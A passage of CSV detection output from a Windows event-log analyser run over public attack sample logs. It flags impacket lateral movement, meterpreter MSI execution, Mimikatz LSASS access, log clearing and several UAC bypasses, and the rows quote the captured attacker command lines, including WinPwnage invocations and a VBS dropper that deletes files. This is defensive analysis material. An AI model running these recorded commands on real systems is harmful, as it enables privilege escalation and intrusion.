\\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe 
-Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: 
C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: 
?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : 
User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p 
